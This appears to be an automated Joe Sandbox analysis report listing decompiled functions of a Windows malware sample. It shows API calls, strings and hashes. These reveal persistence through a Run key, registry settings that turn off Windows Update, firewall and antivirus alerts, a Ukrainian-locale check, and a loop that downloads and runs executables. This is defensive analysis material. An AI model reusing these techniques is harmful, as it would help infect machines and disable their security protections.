Part of subcall function 00401330: CloseHandle.KERNEL32(Function_00001100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

CreateThread.KERNELBASE(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
Instruction ID: 53638d0e5b86ff224420f1c7f9a69720ea7b841d4339b56c2ae1fb68745f7462
Opcode Fuzzy Hash: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
Instruction Fuzzy Hash: CA11B974A40710AFE360DF749C0AF877AE0AF04B14F50892DF599E72E1E3F49544878A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,004075B8), ref: 0040E983
strcmp.NTDLL ref: 0040E992

Strings

UKR, xrefs: 0040E989

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
Instruction ID: aa0b77ea91eb2b23b28eec9c342f5ca45138d15d753f47792771d9b4db2dab4a
Opcode Fuzzy Hash: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
Instruction Fuzzy Hash: FEE0C272A4430876DA10A6A1AE03BAA771C5F11701F000076AF04A61C1E9B9962992DB

Uniqueness

Uniqueness Score: -1.00%

Function 00407230 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
Instruction ID: ca69fba6b54e64f770d722f29a675e987051da8ecabaa1b948e8599c783208a7
Opcode Fuzzy Hash: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
Instruction Fuzzy Hash: 87E0C97490420CBFDB00DFA0C889B9EBBB8AB08715F1081A9E90467280D7B56A948B95

Uniqueness

Uniqueness Score: -1.00%

Function 004074D0 Relevance: 214.1, APIs: 78, Strings: 44, Instructions: 569
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 004074DE
CreateMutexA.KERNELBASE(00000000,00000000,ax765638x6xa), ref: 004074ED
GetLastError.KERNEL32 ref: 004074F9
ExitProcess.KERNEL32 ref: 00407508
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\135143440.exe,00000105), ref: 00407542
PathFindFileNameW.SHLWAPI(C:\Users\user\AppData\Local\Temp\135143440.exe), ref: 0040754D
wsprintfW.USER32 ref: 0040756A
DeleteFileW.KERNELBASE(?), ref: 0040757A
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407591
wcscmp.NTDLL ref: 004075A3
ExitProcess.KERNEL32 ref: 004075C2

Strings

sysvratrel.exe, xrefs: 00407597, 004075DF, 00407692
FirewallOverride, xrefs: 004079B1
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407753
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 004078A2
AntiVirusDisableNotify, xrefs: 00407B39
%s\tbtcmds.dat, xrefs: 00407BE4
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 004077A1
%s\tbtnds.dat, xrefs: 00407BCA
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004076E8
C:\Users\user\AppData\Local\Temp\135143440.exe, xrefs: 0040753B, 00407548, 00407559, 00407609, 004076BC
UpdatesOverride, xrefs: 00407B58
FirewallDisableNotify, xrefs: 004079D0
CheckedValue, xrefs: 0040795F
UpdatesDisableNotify, xrefs: 00407A6B
UpdatesDisableNotify, xrefs: 00407B77
WindowsUpdate, xrefs: 0040781E
NoAutoUpdate, xrefs: 004077C2
NoAutoUpdate, xrefs: 004078C3
FirewallDisableNotify, xrefs: 00407ADC
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407635
ax765638x6xa, xrefs: 004074E4
UpdatesOverride, xrefs: 00407A4C
%s\%s, xrefs: 004075EB
AntiSpywareOverride, xrefs: 00407AFB
AntiVirusDisableNotify, xrefs: 00407A2D
%windir%, xrefs: 004075D4
Windows Settings, xrefs: 00407668, 0040771B
%s:Zone.Identifier, xrefs: 0040755E
%s\%s, xrefs: 0040769E
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 0040784B
AntiSpywareOverride, xrefs: 004079EF
FirewallOverride, xrefs: 00407ABD
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, xrefs: 0040793E
Start, xrefs: 00407911
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 00407A98
C:\Users\user\tbtnds.dat, xrefs: 00407BCF
SOFTWARE\Policies\Microsoft\Windows, xrefs: 004077F4
AntiVirusOverride, xrefs: 00407A0E
AntiVirusOverride, xrefs: 00407B1A
SOFTWARE\Microsoft\Security Center, xrefs: 0040798C
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 004078F0
%userprofile%, xrefs: 0040758C
Start, xrefs: 00407774
C:\Users\user\tbtcmds.dat, xrefs: 00407BE9

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\AppData\Local\Temp\135143440.exe$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$CheckedValue$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$ax765638x6xa$sysvratrel.exe
API String ID: 4172876685-1267113774
Opcode ID: c210d785436f2f0940d6693cbe524f03ff9d77bd905ac6bc26fc141802259303
Instruction ID: 01c652a6eea3614599500b2dbdc2b26867472a33c88adbc755e5585b16fefd61
Opcode Fuzzy Hash: c210d785436f2f0940d6693cbe524f03ff9d77bd905ac6bc26fc141802259303
Instruction Fuzzy Hash: 582275B1B80318BBE7209B90DC4AFE97775AB4CB05F5080A9B305BA1D1D6F4A984CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED20 Relevance: 77.2, APIs: 37, Strings: 7, Instructions: 235
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040ED29
srand.MSVCRT ref: 0040ED30
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040ED50
strlen.NTDLL ref: 0040ED5A
mbstowcs.NTDLL ref: 0040ED71
rand.MSVCRT ref: 0040ED79
rand.MSVCRT ref: 0040ED8D
wsprintfW.USER32 ref: 0040EDB4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EDCA
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EDF9
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EE28
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EE5B
WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040EE8C
CloseHandle.KERNEL32(000000FF), ref: 0040EE9B
wsprintfW.USER32 ref: 0040EEB4
DeleteFileW.KERNELBASE(?), ref: 0040EEC4
Sleep.KERNELBASE(000003E8), ref: 0040EECF
Sleep.KERNEL32(000007D0), ref: 0040EEF0
ExitProcess.KERNEL32 ref: 0040EF18
DeleteFileW.KERNEL32(?), ref: 0040EF2E
CloseHandle.KERNEL32(000000FF), ref: 0040EF3B
InternetCloseHandle.WININET(00000000), ref: 0040EF48
InternetCloseHandle.WININET(00000000), ref: 0040EF55
Sleep.KERNEL32(000003E8), ref: 0040EF60
rand.MSVCRT ref: 0040EF75
Sleep.KERNEL32 ref: 0040EF8C
rand.MSVCRT ref: 0040EF92
rand.MSVCRT ref: 0040EFA6
wsprintfW.USER32 ref: 0040EFCD
DeleteUrlCacheEntryW.WININET(?), ref: 0040EFDD
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040EFF7
wsprintfW.USER32 ref: 0040F017
DeleteFileW.KERNEL32(?), ref: 0040F027
Sleep.KERNEL32(000003E8), ref: 0040F032
Sleep.KERNEL32(000007D0), ref: 0040F053
ExitProcess.KERNEL32 ref: 0040F07A
DeleteFileW.KERNEL32(?), ref: 0040F089

Strings

fs@, xrefs: 0040F06F, 0040EF0D
%s\%d%d.exe, xrefs: 0040EFC1
%s:Zone.Identifier, xrefs: 0040EEA8
%temp%, xrefs: 0040ED4B
%s:Zone.Identifier, xrefs: 0040F00B
%s\%d%d.exe, xrefs: 0040EDA8
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EDC5

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$fs@
API String ID: 3526668077-4111046768
Opcode ID: c5988ea26b3bb92b178f5d74f81669c905be15f1af6d42834315cd531e57167b
Instruction ID: ad06c6bce1eeec4b269cf6b178fa0be949fbab599c126aebf23d2838ae6487db
Opcode Fuzzy Hash: c5988ea26b3bb92b178f5d74f81669c905be15f1af6d42834315cd531e57167b
Instruction Fuzzy Hash: 8291EBB1940318ABE720DB61DC49FEA3379BB88701F0484B9F209A51C1DAB99AD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B010: gethostname.WS2_32(?,00000100), ref: 0040B02C
Part of subcall function 0040B010: gethostbyname.WS2_32(?), ref: 0040B03E

strcmp.NTDLL ref: 0040B110

Strings

.192, xrefs: 0040B19E
127., xrefs: 0040B121
.10, xrefs: 0040B1FD
.10., xrefs: 0040B21B
192., xrefs: 0040B180
10., xrefs: 0040B1DF
.127, xrefs: 0040B13F
0.0.0.0, xrefs: 0040B0FE
.192., xrefs: 0040B1BC
.127., xrefs: 0040B15D

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: ef46493d462c0015352365694cd622c9671cfbedd46860d756f0f998993e3d3d
Instruction ID: 14285435020103c943bf7af990fcf7992b9b4842fd13eaff794dfd4de82f65c2
Opcode Fuzzy Hash: ef46493d462c0015352365694cd622c9671cfbedd46860d756f0f998993e3d3d
Instruction Fuzzy Hash: 5061A3B5904304A7DB10EF65DC4AAAE3B74AB50348F14843AEC05773D2E73DEA54C69E

Uniqueness

Uniqueness Score: -1.00%

Function 00405820 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00405838
GetModuleHandleW.KERNEL32(00000000), ref: 00405850
Sleep.KERNELBASE(00000001), ref: 00405864
GetTickCount.KERNEL32 ref: 0040586A
GetTickCount.KERNEL32 ref: 00405873
wsprintfW.USER32 ref: 00405886
RegisterClassExW.USER32(00000030), ref: 00405893
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
TranslateMessage.USER32(?), ref: 004058E5
DispatchMessageA.USER32(?), ref: 004058EF
ExitThread.KERNEL32 ref: 00405901

Strings

%x%X, xrefs: 0040587A
0, xrefs: 00405840

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
Instruction ID: b462c37bb5856212f40d891765093af4ebd6b4ddfa956f9ba6030597f9716a14
Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
Instruction Fuzzy Hash: 3B212F71940308BBEB10ABA0DC49FEE7B78EB04711F148439F605BA1D0DBB955948F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA00 Relevance: 16.6, APIs: 11, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040EA32
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EA53
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040EA72
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EA8B
memcmp.NTDLL ref: 0040EB1D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040EB40
CloseHandle.KERNEL32(00000000), ref: 0040EB4A
CloseHandle.KERNEL32(000000FF), ref: 0040EB54
CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EB73
WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040EB98
CloseHandle.KERNEL32(000000FF), ref: 0040EBA2

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 625729bca970ea188e75b6ac59ea132eb9e050d626a68e670ae1dd538be4b74b
Instruction ID: 5fa72956d792c98bf49e98e2e31999c9ee619b8bc34dd7c72e15d09ac2df7f98
Opcode Fuzzy Hash: 625729bca970ea188e75b6ac59ea132eb9e050d626a68e670ae1dd538be4b74b
Instruction Fuzzy Hash: C2514EB5E40208FBDB14DFA4CC49FDEB774AB48704F108569E611B72C0D7B9AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D510 Relevance: 16.6, APIs: 11, Instructions: 95
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0040D516
GetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,021A0638,000000FF), ref: 0040D51D
GetCurrentThread.KERNEL32 ref: 0040D528
SetThreadPriority.KERNELBASE(00000000,?,?,?,00407D0E,021A0638,000000FF), ref: 0040D52F
InterlockedExchangeAdd.KERNEL32(00407D0E,00000000), ref: 0040D552
EnterCriticalSection.KERNEL32(000000FB), ref: 0040D587
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D5D2
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D5EE
Sleep.KERNELBASE(00000001), ref: 0040D61E
GetCurrentThread.KERNEL32 ref: 0040D62D
SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E), ref: 0040D634

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
Instruction ID: 00112f281c6e7fc3510a654903225a70fc6abbe47ad766b876a095a97212bdbe
Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
Instruction Fuzzy Hash: 64411C74E00209EFDB14CFE4D848BAEBBB5EF48305F108566E905A7380D7799A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B500 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(004176A8,?,?,?,?,?,?,00407C92), ref: 0040B50B
CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B55D
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B57E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B59D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B5B2
UnmapViewOfFile.KERNEL32(00000000), ref: 0040B618
CloseHandle.KERNEL32(00000000), ref: 0040B622
CloseHandle.KERNEL32(000000FF), ref: 0040B62C

Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8

Strings

C:\Users\user\tbtnds.dat, xrefs: 0040B558

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID: C:\Users\user\tbtnds.dat
API String ID: 439099756-681901067
Opcode ID: b077be6e4a9d01028eadd6adedd7d2846680c744cd7a084032a35666e1c91687
Instruction ID: 29fa8a612647d1d21a92a83f8fc84a43d263a312b3bcc6ad32b06dcb2fb765dc
Opcode Fuzzy Hash: b077be6e4a9d01028eadd6adedd7d2846680c744cd7a084032a35666e1c91687
Instruction Fuzzy Hash: 41413C74E40309BBDB10DFA4CC4ABAEB770EB44708F208569E611B72D1C7B96641CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00416C40,?,?,?,?,?,00407C5C), ref: 00405B6B
CreateFileW.KERNELBASE(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407C5C), ref: 00405B85
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
CloseHandle.KERNEL32(00000000), ref: 00405C75
CloseHandle.KERNEL32(000000FF), ref: 00405C7F

Strings

C:\Users\user\tbtcmds.dat, xrefs: 00405B80

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID: C:\Users\user\tbtcmds.dat
API String ID: 3956458805-126538273
Opcode ID: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
Instruction ID: fe22dcd5f9c76504c29afc9a33c71b71b278b318499f2180723d1a87b0050cb8
Opcode Fuzzy Hash: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
Instruction Fuzzy Hash: 76311B74A40308EBEB14DBA4CD4AFAFB774EB44704F208569E601772D0D7B96A81CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040EBCE
memset.NTDLL ref: 0040EBDE
CreateProcessW.KERNELBASE(00000000,0040F065,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EC17
Sleep.KERNELBASE(000003E8), ref: 0040EC27
ShellExecuteW.SHELL32(00000000,open,0040F065,00000000,00000000,00000000), ref: 0040EC42
Sleep.KERNEL32(000003E8), ref: 0040EC5C

Strings

open, xrefs: 0040EC3B
D, xrefs: 0040EBE6
, xrefs: 0040EC51

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
Instruction ID: 0351ccfd918ecb695d128b5eda6762ce2dd083b24a7fe2c71c98e7e13efc789c
Opcode Fuzzy Hash: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
Instruction Fuzzy Hash: FE114271A44308BBF710DB91DD46FDE7774AB14B00F104125F6057E2C1D6FA5A44C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60
